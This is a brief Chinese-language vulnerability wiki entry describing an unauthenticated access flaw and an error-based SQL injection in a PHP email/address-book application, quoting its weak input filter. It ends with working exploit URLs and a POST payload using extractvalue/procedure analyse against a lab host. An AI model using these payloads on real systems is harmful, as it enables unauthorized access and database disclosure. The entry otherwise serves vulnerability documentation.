pwnwiki.com
,
未授权访问
action/action.address.php
header("Content-type: text/html; charset=utf-8"); if(!defined('CORE'))exit("error!"); .....
页面未加用户是否登录判断,打开页面是普通用户权限。 (系统是可以注册的。)
SQL注入
lib/func.class.php
function _RunMagicQuotes(&$svar){ if(!get_magic_quotes_gpc()) { if( is_array($svar) ){ foreach($svar as $_k => $_v) $svar$_k = _RunMagicQuotes($_v); }else{ $svar = addslashes($svar); } } return $svar; }
过滤的函数_RunMagicQuotes,判断是否开启了get_magic_quotes_gpc,如果开启就用gpc过滤,如果没有开启用addslashes过滤。 5.4.0 始终返回 FALSE,因为这个魔术引号功能已经从 PHP 中移除了。
漏洞利用
未授权访问Payload
http://192.168.116.138/eml/index.php?action=address
SQL注入Payload
get方法,判断注入是否存在:
http://192.168.116.138/eml/index.php?action=address&pageNum=/1
post方法:
http://192.168.116.138/eml/index.php?action=address&pageNum=0 numPerPage=1 procedure analyse(1,extractvalue(rand(),concat(0x7e,version())));
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库